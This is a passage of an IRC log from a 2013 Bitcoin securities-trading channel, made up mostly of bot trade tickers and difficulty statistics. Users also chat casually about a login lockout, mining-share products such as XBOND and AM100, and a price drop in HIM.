14:04:21 [HAVELOCK] [XBOND] 425 @ 0.00103999 = 0.442 BTC [-] Aug 04 14:10:10 ;;nethash Aug 04 14:10:11 302190.606118 Aug 04 14:10:16 ;;bsstats Aug 04 14:10:16 Error: "bsstats" is not a valid command. Aug 04 14:10:20 ;;bcstats Aug 04 14:10:22 Current Blocks: 250149 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 1850 blocks | Next Difficulty In About: 1 week, 4 days, 0 hours, 17 minutes, and 8 seconds | Next Difficulty Estimate: 42917295.8926 | Estimated Percent Change: 14.77433 Aug 04 14:12:20 [BTCTC] [ACTIVEMINING] 16 @ 0.006409 = 0.1025 BTC [+] Aug 04 14:17:59 [BTCTC] [LABCOIN] 1 @ 0.001751 BTC [-] Aug 04 14:18:01 [BTCTC] [LABCOIN] 3 @ 0.00175 = 0.0053 BTC [-] Aug 04 14:18:02 [BTCTC] [LABCOIN] 1 @ 0.001727 BTC [-] Aug 04 14:18:03 [BTCTC] [LABCOIN] 11 @ 0.001726 = 0.019 BTC [-] Aug 04 14:18:04 [BTCTC] [LABCOIN] 69 @ 0.001725 = 0.119 BTC [-] Aug 04 14:18:38 [BTCTC] [ACTIVEMINING] 50 @ 0.006301 = 0.3151 BTC [-] Aug 04 14:18:55 [BTCTC] [ACTIVEMINING] 220 @ 0.0063 = 1.386 BTC [-] Aug 04 14:20:02 [BTCTC] [LABCOIN] 25 @ 0.001732 = 0.0433 BTC [+] Aug 04 14:20:47 [BTCTC] [LABCOIN] 2 @ 0.001728 = 0.0035 BTC [-] Aug 04 14:23:51 [BTCTC] [LABCOIN] 8 @ 0.001728 = 0.0138 BTC [-] Aug 04 14:27:26 [BTCTC] [LABCOIN] 1 @ 0.001728 BTC [-] Aug 04 14:27:47 [BTCTC] [LABCOIN] 2 @ 0.001739 = 0.0035 BTC [+] Aug 04 14:28:13 [BTCTC] [LABCOIN] 2 @ 0.001739 = 0.0035 BTC [+] Aug 04 14:28:14 [BTCTC] [LABCOIN] 12 @ 0.00174 = 0.0209 BTC [+] Aug 04 14:28:33 [BTCTC] [LABCOIN] 2 @ 0.00174 = 0.0035 BTC [+] Aug 04 14:29:18 [BTCTC] [LABCOIN] 6 @ 0.001753 = 0.0105 BTC [+] Aug 04 14:29:41 [BTCTC] [LABCOIN] 41 @ 0.001754 = 0.0719 BTC [+] Aug 04 14:38:41 [BTCTC] [LABCOIN] 1 @ 0.00176 BTC [+] Aug 04 14:49:42 [BTCTC] [LABCOIN] 5 @ 0.001782 = 0.0089 BTC [+] Aug 04 14:50:21 what does "Access Temporarily Denied" mean? :P Aug 04 14:51:13 usually you get something like that for too many failed login attempts in a time period Aug 04 14:51:20 Hmm. Aug 04 14:51:24 That's not good. Aug 04 14:51:35 after a set time it will allow you to try again Aug 04 14:51:57 is burnside the only admin here? Aug 04 14:52:03 ie; can someone check my balance is still there :| Aug 04 14:52:08 [BTCTC] [LABCOIN] 5 @ 0.001782 = 0.0089 BTC [+] Aug 04 14:52:09 [BTCTC] [LABCOIN] 30 @ 0.001783 = 0.0535 BTC [+] Aug 04 14:52:11 [BTCTC] [LABCOIN] 3 @ 0.001784 = 0.0054 BTC [+] Aug 04 14:52:12 [BTCTC] [LABCOIN] 18 @ 0.001785 = 0.0321 BTC [+] Aug 04 14:52:13 [BTCTC] [LABCOIN] 20 @ 0.001798 = 0.036 BTC [+] Aug 04 14:52:14 [BTCTC] [LABCOIN] 50 @ 0.001799 = 0.09 BTC [+] Aug 04 14:52:15 [BTCTC] [LABCOIN] 70 @ 0.0018 = 0.126 BTC [+] Aug 04 14:52:35 well if someone was trying and not doing the 2fa bit your account would be safe Aug 04 14:52:57 I guess someone trying to hack my account. Lame. Aug 04 14:53:20 always possible, hopefully there is another explanation :) Aug 04 14:53:49 i dont know anything specific about this site, just speaking generically :)0 Aug 04 14:54:07 I got that too Aug 04 14:54:20 usually after 30-60 minutes it will time out and you will be able to try again Aug 04 14:55:04 [BTCTC] [LABCOIN] 3 @ 0.001802 = 0.0054 BTC [+] Aug 04 14:55:25 [BTCTC] [LABCOIN] 57 @ 0.001802 = 0.1027 BTC [+] Aug 04 15:00:05 [HAVELOCK] [XBOND] [PAID] 1.00000000 BTC to 2`000`000 shares, 50 satoshi per share Aug 04 15:00:44 [BTCTC] [DMS.MINING] 1 @ 0.008399 BTC [+] Aug 04 15:00:49 [BTCTC] [BTCGARDEN] 14 @ 0.01672 = 0.2341 BTC [-] Aug 04 15:01:28 [HAVELOCK] [XBOND] 2 @ 0.00103999 = 0.0021 BTC [-] Aug 04 15:01:39 [BTCTC] [DMS.MINING] 2 @ 0.008399 = 0.0168 BTC [+] Aug 04 15:03:46 [HAVELOCK] [SMG] 16 @ 0.0002444 = 0.0039 BTC [-] Aug 04 15:05:28 [BTCTC] [DMS.MINING] 9 @ 0.008399 = 0.0756 BTC [+] Aug 04 15:10:43 [HAVELOCK] [VTX] 1 @ 0.478 BTC [+] Aug 04 15:10:58 [HAVELOCK] [SMG] 75 @ 0.0002444 = 0.0183 BTC [-] Aug 04 15:11:25 [BTCTC] [ASICMINER-PT] 5 @ 4.049 = 20.245 BTC [+] Aug 04 15:12:30 [BTCTC] [ASICMINER-PT] 1 @ 4.049 BTC [+] Aug 04 15:13:00 [HAVELOCK] [XBOND] 2 @ 0.00103999 = 0.0021 BTC [-] Aug 04 15:13:25 [HAVELOCK] [XBOND] 400 @ 0.00103999 = 0.416 BTC [-] Aug 04 15:14:36 [MPEX] [S.MPOE] 5650 @ 0.00082999 = 4.6894 BTC [-] Aug 04 15:22:09 [HAVELOCK] [SDSTM] 1 @ 0.00718311 BTC [-] Aug 04 15:22:40 [HAVELOCK] [XBOND] 6 @ 0.00103999 = 0.0062 BTC [-] Aug 04 15:23:44 [HAVELOCK] [LABCO] 10 @ 0.0018166 = 0.0182 BTC [+] Aug 04 15:24:19 [HAVELOCK] [XBOND] 18 @ 0.00103999 = 0.0187 BTC [-] Aug 04 15:25:36 [HAVELOCK] [LABCO] 4 @ 0.0018166 = 0.0073 BTC [+] Aug 04 15:25:58 [HAVELOCK] [XBOND] 7 @ 0.00103999 = 0.0073 BTC [-] Aug 04 15:28:47 [HAVELOCK] [SDSTM] 1 @ 0.007181 BTC [-] Aug 04 15:29:01 [HAVELOCK] [XBOND] 7 @ 0.00103999 = 0.0073 BTC [-] Aug 04 15:32:21 [MPEX] [S.MPOE] 2200 @ 0.00082863 = 1.823 BTC [-] Aug 04 15:32:23 [MPEX] [S.MPOE] 8300 @ 0.00082562 = 6.8526 BTC [-] Aug 04 15:32:25 [MPEX] [S.MPOE] 5750 @ 0.0008239 = 4.7374 BTC [-] Aug 04 15:32:39 [BTCTC] [BTCGARDEN] 1 @ 0.0165 BTC [-] Aug 04 15:41:14 [BTCTC] [LABCOIN] 333 @ 0.001796 = 0.5981 BTC [-] Aug 04 15:41:32 [HAVELOCK] [AM1] 1 @ 4.14999999 BTC [+] Aug 04 15:42:19 [HAVELOCK] [AM100] 1 @ 0.0363 BTC [-] Aug 04 15:42:50 [HAVELOCK] [AM100] 10 @ 0.0383 = 0.383 BTC [+] Aug 04 15:43:03 [HAVELOCK] [LABCO] 24 @ 0.0022 = 0.0528 BTC [+] Aug 04 15:44:45 [BTCTC] [TAT.MINIGAME] 7 @ 0.000254 = 0.0018 BTC [+] Aug 04 15:51:19 [BTCTC] [ACTIVEMINING] 12 @ 0.006208 = 0.0745 BTC [-] Aug 04 15:51:20 [BTCTC] [ACTIVEMINING] 50 @ 0.006207 = 0.3104 BTC [-] Aug 04 15:51:22 [BTCTC] [ACTIVEMINING] 63 @ 0.006204 = 0.3909 BTC [-] Aug 04 15:51:23 [BTCTC] [ACTIVEMINING] 52 @ 0.006203 = 0.3226 BTC [-] Aug 04 15:51:23 [BTCTC] [ACTIVEMINING] 100 @ 0.006202 = 0.6202 BTC [-] Aug 04 15:51:24 [BTCTC] [ACTIVEMINING] 52 @ 0.0062 = 0.3224 BTC [-] Aug 04 15:51:25 [BTCTC] [ACTIVEMINING] 1 @ 0.0062 BTC [-] Aug 04 15:51:26 [BTCTC] [ACTIVEMINING] 50 @ 0.0062 = 0.31 BTC [-] Aug 04 15:51:28 [BTCTC] [ACTIVEMINING] 62 @ 0.006177 = 0.383 BTC [-] Aug 04 15:51:29 [BTCTC] [ACTIVEMINING] 50 @ 0.006176 = 0.3088 BTC [-] Aug 04 15:51:30 [BTCTC] [ACTIVEMINING] 200 @ 0.006175 = 1.235 BTC [-] Aug 04 15:51:31 [BTCTC] [ACTIVEMINING] 374 @ 0.006161 = 2.3042 BTC [-] Aug 04 15:51:32 [BTCTC] [ACTIVEMINING] 10 @ 0.00616 = 0.0616 BTC [-] Aug 04 15:51:32 [BTCTC] [ACTIVEMINING] 486 @ 0.006159 = 2.9933 BTC [-] Aug 04 15:51:33 [BTCTC] [ACTIVEMINING] 1000 @ 0.006158 = 6.158 BTC [-] Aug 04 15:51:34 [BTCTC] [ACTIVEMINING] 50 @ 0.006111 = 0.3056 BTC [-] Aug 04 15:51:35 [BTCTC] [ACTIVEMINING] 201 @ 0.00611 = 1.2281 BTC [-] Aug 04 15:51:36 [BTCTC] [ACTIVEMINING] 838 @ 0.00604 = 5.0615 BTC [-] Aug 04 15:51:37 [BTCTC] [ACTIVEMINING] 209 @ 0.006039 = 1.2622 BTC [-] Aug 04 15:51:38 [BTCTC] [ACTIVEMINING] 5 @ 0.006033 = 0.0302 BTC [-] Aug 04 15:51:39 [BTCTC] [ACTIVEMINING] 23 @ 0.006032 = 0.1387 BTC [-] Aug 04 15:51:41 [BTCTC] [ACTIVEMINING] 100 @ 0.006004 = 0.6004 BTC [-] Aug 04 15:51:42 [BTCTC] [ACTIVEMINING] 100 @ 0.006003 = 0.6003 BTC [-] Aug 04 15:51:43 [BTCTC] [ACTIVEMINING] 300 @ 0.006003 = 1.8009 BTC [-] Aug 04 15:51:44 [BTCTC] [ACTIVEMINING] 1 @ 0.005904 BTC [-] Aug 04 15:55:23 [BTCTC] [LABCOIN] 90 @ 0.001796 = 0.1616 BTC [-] Aug 04 15:55:53 [BTCTC] [LABCOIN] 1 @ 0.001796 BTC [-] Aug 04 16:02:25 [MPEX] [S.MPOE] 3150 @ 0.00082948 = 2.6129 BTC [+] Aug 04 16:05:42 [BTCTC] [DMS.MINING] 1 @ 0.008399 BTC [+] Aug 04 16:05:48 [MPEX] [S.MPOE] 6350 @ 0.00082999 = 5.2704 BTC [+] Aug 04 16:05:50 [MPEX] [S.MPOE] 722 @ 0.00083132 = 0.6002 BTC [+] Aug 04 16:05:52 [MPEX] [S.MPOE] 4278 @ 0.00083142 = 3.5568 BTC [+] Aug 04 16:06:25 [BTCTC] [BITVPS] 250 @ 0.002421 = 0.6053 BTC [-] Aug 04 16:06:26 [BTCTC] [BITVPS] 500 @ 0.00242 = 1.21 BTC [-] Aug 04 16:06:28 [BTCTC] [BITVPS] 100 @ 0.0024 = 0.24 BTC [-] Aug 04 16:06:29 [BTCTC] [BITVPS] 19 @ 0.0024 = 0.0456 BTC [-] Aug 04 16:07:08 [BTCTC] [BITVPS] 1 @ 0.002329 BTC [-] Aug 04 16:09:02 [BTCTC] [DMS.MINING] 11 @ 0.008399 = 0.0924 BTC [+] Aug 04 16:19:38 [BTCTC] [DMS.MINING] 4 @ 0.008399 = 0.0336 BTC [+] Aug 04 16:21:59 XBOND pays for itself in 10 days with fees Aug 04 16:22:25 How so? The fund doesnt pay that much in dividends. Kind of confused. Aug 04 16:22:44 [BTCTC] [ACTIVEMINING] 25 @ 0.006008 = 0.1502 BTC [+] Aug 04 16:22:45 [BTCTC] [ACTIVEMINING] 6 @ 0.006007 = 0.036 BTC [-] Aug 04 16:22:46 [BTCTC] [ACTIVEMINING] 19 @ 0.006006 = 0.1141 BTC [-] Aug 04 16:23:04 if you take into account the price you can sell it at? Aug 04 16:23:05 he's equalizing that liquidity is free Aug 04 16:24:29 [HAVELOCK] [XBOND] 1 @ 0.00103999 BTC [-] Aug 04 16:27:01 I guess that would be the way I'd see it pankkake Aug 04 16:27:09 I bought a bunch myself. Aug 04 16:28:47 [BTCTC] [ASICMINER-PT] 1 @ 4.049 BTC [+] Aug 04 16:28:47 [BTCTC] [ASICMINER-PT] 5 @ 4.05 = 20.25 BTC [+] Aug 04 16:30:59 [BTCTC] [S.MPOE-PT] 1 @ 0.0011 BTC [+] Aug 04 16:35:56 [BTCTC] [COGNITIVE] 1 @ 0.441 BTC [-] Aug 04 16:40:38 [BTCTC] [ASICMINER-PT] 5 @ 4.05 = 20.25 BTC [+] Aug 04 16:40:57 [BTCTC] [BTCGARDEN] 20 @ 0.01627 = 0.3254 BTC [-] Aug 04 16:44:18 [HAVELOCK] [XBOND] 617 @ 0.00103999 = 0.6417 BTC [-] Aug 04 16:45:35 [HAVELOCK] [XBOND] 6 @ 0.00103999 = 0.0062 BTC [-] Aug 04 16:45:49 [BTCTC] [LABCOIN] 1 @ 0.001792 BTC [-] Aug 04 16:45:51 [BTCTC] [LABCOIN] 10 @ 0.001793 = 0.0179 BTC [+] Aug 04 16:45:52 [BTCTC] [LABCOIN] 25 @ 0.001794 = 0.0449 BTC [+] Aug 04 16:45:53 [BTCTC] [LABCOIN] 8 @ 0.001795 = 0.0144 BTC [+] Aug 04 16:51:32 [BTCTC] [BTCGARDEN] 67 @ 0.01626 = 1.0894 BTC [-] Aug 04 16:51:35 [BTCTC] [BTCGARDEN] 418 @ 0.01626 = 6.7967 BTC [-] Aug 04 16:56:22 [HAVELOCK] [XBOND] 1 @ 0.00103999 BTC [-] Aug 04 16:56:36 [HAVELOCK] [XBOND] 1 @ 0.00103999 BTC [-] Aug 04 17:03:59 I would say by september xbond will finally have equidistant liquidity costs for buyers and sellers, so it seems it all works out. Kind of a butt kicker for people who didn't buy more during IPO Aug 04 17:05:28 [HAVELOCK] [XBOND] 2000 @ 0.00103999 = 2.08 BTC [-] Aug 04 17:07:00 [HAVELOCK] [XBOND] 4 @ 0.00103999 = 0.0042 BTC [-] Aug 04 17:07:06 [MPEX] [S.MPOE] 7950 @ 0.00082948 = 6.5944 BTC [-] Aug 04 17:07:08 [MPEX] [S.MPOE] 1633 @ 0.0008239 = 1.3454 BTC [-] Aug 04 17:07:17 these scalping muhter fuckers Aug 04 17:07:55 [HAVELOCK] [XBOND] 25 @ 0.00103999 = 0.026 BTC [-] Aug 04 17:10:53 [BTCTC] [LABCOIN] 30 @ 0.001792 = 0.0538 BTC [-] Aug 04 17:11:49 [BTCTC] [LABCOIN] 1000 @ 0.001792 = 1.792 BTC [-] Aug 04 17:12:02 [BTCTC] [BITVPS] 1 @ 0.00233 BTC [+] Aug 04 17:12:03 [BTCTC] [BITVPS] 1 @ 0.002685 BTC [+] Aug 04 17:12:38 [BTCTC] [BTCGARDEN] 183 @ 0.01626 = 2.9756 BTC [-] Aug 04 17:13:51 [BTCTC] [ACTIVEMINING] 100 @ 0.006016 = 0.6016 BTC [+] Aug 04 17:13:53 [BTCTC] [ACTIVEMINING] 87 @ 0.006015 = 0.5233 BTC [-] Aug 04 17:13:54 [BTCTC] [ACTIVEMINING] 150 @ 0.006015 = 0.9023 BTC [-] Aug 04 17:13:55 [BTCTC] [ACTIVEMINING] 50 @ 0.006014 = 0.3007 BTC [-] Aug 04 17:13:56 [BTCTC] [ACTIVEMINING] 86 @ 0.006014 = 0.5172 BTC [-] Aug 04 17:14:39 New 3-day high for AM farm, 51.5TH Aug 04 17:14:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.0391 BTC [-] Aug 04 17:14:41 [BTCTC] [TAT.ASICMINER] 39 @ 0.03901 = 1.5214 BTC [-] Aug 04 17:14:42 [BTCTC] [TAT.ASICMINER] 184 @ 0.039 = 7.176 BTC [-] Aug 04 17:15:29 [BTCTC] [ACTIVEMINING] 25 @ 0.006249 = 0.1562 BTC [+] Aug 04 17:15:30 [BTCTC] [ACTIVEMINING] 1350 @ 0.00625 = 8.4375 BTC [+] Aug 04 17:15:37 [BTCTC] [BTCGARDEN] 492 @ 0.01625 = 7.995 BTC [-] Aug 04 17:16:11 [BTCTC] [ACTIVEMINING] 20 @ 0.006248 = 0.125 BTC [-] Aug 04 17:16:40 [BTCTC] [ACTIVEMINING] 2 @ 0.006247 = 0.0125 BTC [-] Aug 04 17:18:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.03941 BTC [+] Aug 04 17:18:27 [BTCTC] [TAT.ASICMINER] 16 @ 0.03941 = 0.6306 BTC [+] Aug 04 17:18:36 [BTCTC] [BTCGARDEN] 41 @ 0.01622 = 0.665 BTC [-] Aug 04 17:18:38 [BTCTC] [BTCGARDEN] 1 @ 0.01622 BTC [-] Aug 04 17:18:39 [BTCTC] [BTCGARDEN] 50 @ 0.01622 = 0.811 BTC [-] Aug 04 17:19:54 [BTCTC] [ASICMINER-PT] 1 @ 4.003 BTC [-] Aug 04 17:21:03 [BTCTC] [ASICMINER-PT] 1 @ 4.003 BTC [-] Aug 04 17:21:10 [BTCTC] [DMS.MINING] 18 @ 0.008399 = 0.1512 BTC [+] Aug 04 17:22:12 [BTCTC] [TAT.ASICMINER] 5 @ 0.03941 = 0.1971 BTC [+] Aug 04 17:22:56 [HAVELOCK] [AM100] 3 @ 0.0383 = 0.1149 BTC [+] Aug 04 17:23:05 [HAVELOCK] [AM100] 168 @ 0.0383999 = 6.4512 BTC [+] Aug 04 17:23:10 [HAVELOCK] [AM100] 1 @ 0.03844988 BTC [+] Aug 04 17:23:15 [HAVELOCK] [AM100] 209 @ 0.03845 = 8.0361 BTC [+] Aug 04 17:23:18 [BTCTC] [ACTIVEMINING] 25 @ 0.006238 = 0.156 BTC [-] Aug 04 17:23:21 [HAVELOCK] [AM100] 1 @ 0.03849999 BTC [+] Aug 04 17:23:26 [HAVELOCK] [AM100] 133 @ 0.0385 = 5.1205 BTC [+] Aug 04 17:23:32 [HAVELOCK] [AM100] 46 @ 0.0386 = 1.7756 BTC [+] Aug 04 17:23:39 [HAVELOCK] [AM100] 285 @ 0.0386999 = 11.0295 BTC [+] Aug 04 17:23:57 [HAVELOCK] [AM100] 166 @ 0.0387977 = 6.4404 BTC [+] Aug 04 17:24:05 [HAVELOCK] [AM100] 49 @ 0.03879775 = 1.9011 BTC [+] Aug 04 17:24:09 [BTCTC] [ACTIVEMINING] 25 @ 0.006236 = 0.1559 BTC [-] Aug 04 17:24:52 [BTCTC] [ACTIVEMINING] 25 @ 0.006235 = 0.1559 BTC [-] Aug 04 17:25:04 [BTCTC] [TAT.ASICMINER] 73 @ 0.03941 = 2.8769 BTC [+] Aug 04 17:25:24 [BTCTC] [ACTIVEMINING] 25 @ 0.006234 = 0.1559 BTC [-] Aug 04 17:25:43 [BTCTC] [KENILWORTH] 5 @ 0.001798 = 0.009 BTC [-] Aug 04 17:26:03 [BTCTC] [ACTIVEMINING] 25 @ 0.006233 = 0.1558 BTC [-] Aug 04 17:26:32 [BTCTC] [ACTIVEMINING] 25 @ 0.006233 = 0.1558 BTC [-] Aug 04 17:27:01 [BTCTC] [ACTIVEMINING] 25 @ 0.006233 = 0.1558 BTC [-] Aug 04 17:27:24 [BTCTC] [ACTIVEMINING] 25 @ 0.006233 = 0.1558 BTC [-] Aug 04 17:27:24 [BTCTC] [CRYPTO-TRADE] 7 @ 0.1999 = 1.3993 BTC [+] Aug 04 17:27:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.03951 = 0.079 BTC [+] Aug 04 17:27:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.03952 = 0.3952 BTC [+] Aug 04 17:27:29 [BTCTC] [TAT.ASICMINER] 119 @ 0.03952 = 4.7029 BTC [+] Aug 04 17:27:31 [BTCTC] [ACTIVEMINING] 25 @ 0.006233 = 0.1558 BTC [-] Aug 04 17:27:40 [BTCTC] [DMS.MINING] 11 @ 0.008399 = 0.0924 BTC [+] Aug 04 17:27:57 [BTCTC] [ACTIVEMINING] 200 @ 0.006234 = 1.2468 BTC [+] Aug 04 17:28:15 [BTCTC] [ACTIVEMINING] 25 @ 0.006233 = 0.1558 BTC [-] Aug 04 17:28:23 [BTCTC] [ACTIVEMINING] 5 @ 0.006232 = 0.0312 BTC [-] Aug 04 17:28:45 [BTCTC] [ACTIVEMINING] 1 @ 0.006232 BTC [-] Aug 04 17:28:47 ;;estimate Aug 04 17:28:48 Next difficulty estimate | 42548360.7944 based on data since last change | 43047784.7754 based on data for last three days Aug 04 17:28:56 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [+] Aug 04 17:29:22 [BTCTC] [ACTIVEMINING] 12 @ 0.006238 = 0.0749 BTC [+] Aug 04 17:30:13 [BTCTC] [ACTIVEMINING] 1 @ 0.006237 BTC [-] Aug 04 17:30:44 [BTCTC] [ACTIVEMINING] 49 @ 0.006237 = 0.3056 BTC [-] Aug 04 17:31:21 [BTCTC] [ACTIVEMINING] 1 @ 0.006239 BTC [+] Aug 04 17:31:30 slowly getting back to 20% of the network? :) Aug 04 17:31:55 [BTCTC] [ACTIVEMINING] 1000 @ 0.006249 = 6.249 BTC [+] Aug 04 17:33:06 i'm guessing they got the new batch of blades going Aug 04 17:33:11 [BTCTC] [BTCGARDEN] 285 @ 0.01663 = 4.7396 BTC [+] Aug 04 17:33:26 ;;bcstats Aug 04 17:33:29 Current Blocks: 250171 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 1828 blocks | Next Difficulty In About: 1 week, 4 days, 19 hours, 2 minutes, and 42 seconds | Next Difficulty Estimate: 42548360.7944 | Estimated Percent Change: 13.78768 Aug 04 17:33:47 [HAVELOCK] [XBOND] 2 @ 0.00104499 = 0.0021 BTC [+] Aug 04 17:34:25 [BTCTC] [BTCGARDEN] 196 @ 0.0165 = 3.234 BTC [-] Aug 04 17:35:27 [BTCTC] [BTCGARDEN] 165 @ 0.01663 = 2.744 BTC [+] Aug 04 17:35:28 [BTCTC] [ACTIVEMINING] 16 @ 0.006328 = 0.1012 BTC [+] Aug 04 17:36:29 [BTCTC] [BTCGARDEN] 5 @ 0.01666 = 0.0833 BTC [+] Aug 04 17:36:46 [BTCTC] [BTCGARDEN] 33 @ 0.0165 = 0.5445 BTC [-] Aug 04 17:37:22 what is the difference of AM100 on havelock and asicminer-pt on btct? Aug 04 17:37:31 [BTCTC] [ACTIVEMINING] 1 @ 0.006326 BTC [-] Aug 04 17:37:54 [BTCTC] [ACTIVEMINING] 25 @ 0.006055 = 0.1514 BTC [-] Aug 04 17:37:56 [BTCTC] [ACTIVEMINING] 50 @ 0.006054 = 0.3027 BTC [-] Aug 04 17:37:57 [BTCTC] [ACTIVEMINING] 10 @ 0.006052 = 0.0605 BTC [-] Aug 04 17:37:57 I run AM100, BTCT runs AM-PT Aug 04 17:37:58 [BTCTC] [ACTIVEMINING] 16 @ 0.00605 = 0.0968 BTC [-] Aug 04 17:37:59 [BTCTC] [ACTIVEMINING] 1 @ 0.00603 BTC [-] Aug 04 17:38:00 [BTCTC] [ACTIVEMINING] 7 @ 0.006029 = 0.0422 BTC [-] Aug 04 17:38:01 [BTCTC] [ACTIVEMINING] 25 @ 0.006018 = 0.1505 BTC [-] Aug 04 17:38:02 [BTCTC] [ACTIVEMINING] 86 @ 0.006017 = 0.5175 BTC [-] Aug 04 17:38:07 AM100 is fractional shares Aug 04 17:38:14 there are a number of other differences Aug 04 17:38:26 AM100 is available on BTCT too, as TAT.ASICMINER Aug 04 17:38:30 please make sure to read the text before purchase Aug 04 17:38:36 [BTCTC] [BTCGARDEN] 35 @ 0.0165 = 0.5775 BTC [-] Aug 04 17:38:36 that's correct Aug 04 17:38:48 [BTCTC] [ACTIVEMINING] 1 @ 0.006323 BTC [+] Aug 04 17:39:19 [BTCTC] [LABCOIN] 8 @ 0.001741 = 0.0139 BTC [-] Aug 04 17:39:21 [BTCTC] [LABCOIN] 50 @ 0.00174 = 0.087 BTC [-] Aug 04 17:39:22 [BTCTC] [LABCOIN] 3 @ 0.001733 = 0.0052 BTC [-] Aug 04 17:39:23 [BTCTC] [LABCOIN] 19 @ 0.001732 = 0.0329 BTC [-] Aug 04 17:39:25 [BTCTC] [LABCOIN] 916 @ 0.001731 = 1.5856 BTC [-] Aug 04 17:39:26 [BTCTC] [LABCOIN] 1543 @ 0.00173 = 2.6694 BTC [-] Aug 04 17:39:36 [BTCTC] [ASICMINER-PT] 1 @ 4.06 BTC [+] Aug 04 17:39:37 [BTCTC] [TAT.ASICMINER] 42 @ 0.039 = 1.638 BTC [-] Aug 04 17:39:39 [BTCTC] [ASICMINER-PT] 1 @ 4.065 BTC [+] Aug 04 17:39:40 [BTCTC] [ASICMINER-PT] 2 @ 4.069 = 8.138 BTC [+] Aug 04 17:39:40 [BTCTC] [ASICMINER-PT] 3 @ 4.07 = 12.21 BTC [+] Aug 04 17:39:41 [BTCTC] [ASICMINER-PT] 2 @ 4.07 = 8.14 BTC [+] Aug 04 17:39:42 [BTCTC] [ASICMINER-PT] 1 @ 4.078 BTC [+] Aug 04 17:40:33 [BTCTC] [ACTIVEMINING] 25 @ 0.00602 = 0.1505 BTC [-] Aug 04 17:40:34 [BTCTC] [ACTIVEMINING] 9 @ 0.006019 = 0.0542 BTC [-] Aug 04 17:40:36 [BTCTC] [ACTIVEMINING] 14 @ 0.006017 = 0.0842 BTC [-] Aug 04 17:40:37 [BTCTC] [ACTIVEMINING] 7 @ 0.006011 = 0.0421 BTC [-] Aug 04 17:40:38 [BTCTC] [ACTIVEMINING] 28 @ 0.00601 = 0.1683 BTC [-] Aug 04 17:40:39 [BTCTC] [ACTIVEMINING] 1 @ 0.006009 BTC [-] Aug 04 17:41:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.03951 BTC [+] Aug 04 17:41:28 [BTCTC] [TAT.ASICMINER] 7 @ 0.03952 = 0.2766 BTC [+] Aug 04 17:41:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.03971 BTC [+] Aug 04 17:41:31 [BTCTC] [TAT.ASICMINER] 4 @ 0.03972 = 0.1589 BTC [+] Aug 04 17:41:32 [BTCTC] [TAT.ASICMINER] 12 @ 0.03997 = 0.4796 BTC [+] Aug 04 17:41:33 [BTCTC] [TAT.ASICMINER] 9 @ 0.03998 = 0.3598 BTC [+] Aug 04 17:41:34 [BTCTC] [TAT.ASICMINER] 14 @ 0.03999 = 0.5599 BTC [+] Aug 04 17:41:35 [BTCTC] [TAT.ASICMINER] 32 @ 0.03999 = 1.2797 BTC [+] Aug 04 17:42:13 why did HIM crash? Aug 04 17:43:29 did it actually crash or does it just look like it did from the 1:10 split Aug 04 17:44:17 [HAVELOCK] [AM100] 1 @ 0.0388 BTC [+] Aug 04 17:46:37 it splut a long time ago if thats what you meann Aug 04 17:46:40 split Aug 04 17:47:14 !t h HIM Aug 04 17:47:16 [HAVELOCK:HIM] 1D: 0.12539000 / 0.13249772 / 0.14200000 (52 shares, 6.88988126 BTC), 7D: 0.12200001 / 0.14330755 / 0.20000000 (2433 shares, 348.66726056 BTC), 30D: 0.12200001 / 0.1935343 / 0.35400000 (6130 shares, 1186.36526627 BTC) Aug 04 17:48:08 [HAVELOCK] [XBOND] 100 @ 0.00104498 = 0.1045 BTC [-] Aug 04 17:48:22 looks like it crashed a little in the last 7 days Aug 04 17:48:56 [BTCTC] [ACTIVEMINING] 100 @ 0.00618 = 0.618 BTC [+] Aug 04 17:50:30 [HAVELOCK] [AM100] 1 @ 0.0388 BTC [+] Aug 04 17:54:19 [BTCTC] [COGNITIVE] 7 @ 0.4401 = 3.0807 BTC [-] Aug 04 17:55:13 [BTCTC] [BTCGARDEN] 50 @ 0.01662 = 0.831 BTC [+] Aug 04 17:55:29 crashed a little Aug 04 17:55:40 is that like saying that something is little big Aug 04 17:56:19 so funny coming from financial markets, everyone in btc uses the word crash Aug 04 17:57:03 [BTCTC] [LABCOIN] 9 @ 0.001731 = 0.0156 BTC [+] Aug 04 17:57:36 KRS1: well, almost halfing is crashing in a normal market i think, but in bitcoin land.. pretty common, so the word crash might be a little hard Aug 04 17:58:16 [BTCTC] [BTCGARDEN] 1 @ 0.01662 BTC [+] Aug 04 17:59:13 [BTCTC] [BTC-BOND] 13 @ 0.01 = 0.13 BTC [+] Aug 04 17:59:25 [BTCTC] [BFMINES] 7 @ 0.003501 = 0.0245 BTC [-] Aug 04 18:00:02 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.0027 = 0.0108 BTC [-] Aug 04 18:02:13 yeah Aug 04 18:02:41 [BTCTC] [ACTIVEMINING] 4 @ 0.006229 = 0.0249 BTC [+] Aug 04 18:02:44 taking some getting used to..also keep forgetting the volume for btc markets is shit so.. Aug 04 18:02:44 [BTCTC] [ACTIVEMINING] 19 @ 0.00623 = 0.1184 BTC [+] Aug 04 18:02:45 [BTCTC] [ACTIVEMINING] 50 @ 0.006232 = 0.3116 BTC [+] Aug 04 18:02:46 [BTCTC] [ACTIVEMINING] 1 @ 0.006232 BTC [+] Aug 04 18:03:27 [HAVELOCK] [XBOND] 9 @ 0.001043 = 0.0094 BTC [-] Aug 04 18:03:28 HIM tanked because of increasing difficulty brosefs Aug 04 18:03:51 if ASCIMINER receded then everyone else will too Aug 04 18:04:17 I would say that effectively constitutes the start of a mining "crash" Aug 04 18:05:34 [BTCTC] [BTCGARDEN] 36 @ 0.01662 = 0.5983 BTC [+] Aug 04 18:05:35 [BTCTC] [BTCGARDEN] 5 @ 0.01666 = 0.0833 BTC [+] Aug 04 18:05:36 [BTCTC] [BTCGARDEN] 50 @ 0.01666 = 0.833 BTC [+] Aug 04 18:05:38 [BTCTC] [BTCGARDEN] 200 @ 0.01669 = 3.338 BTC [+] Aug 04 18:05:39 [BTCTC] 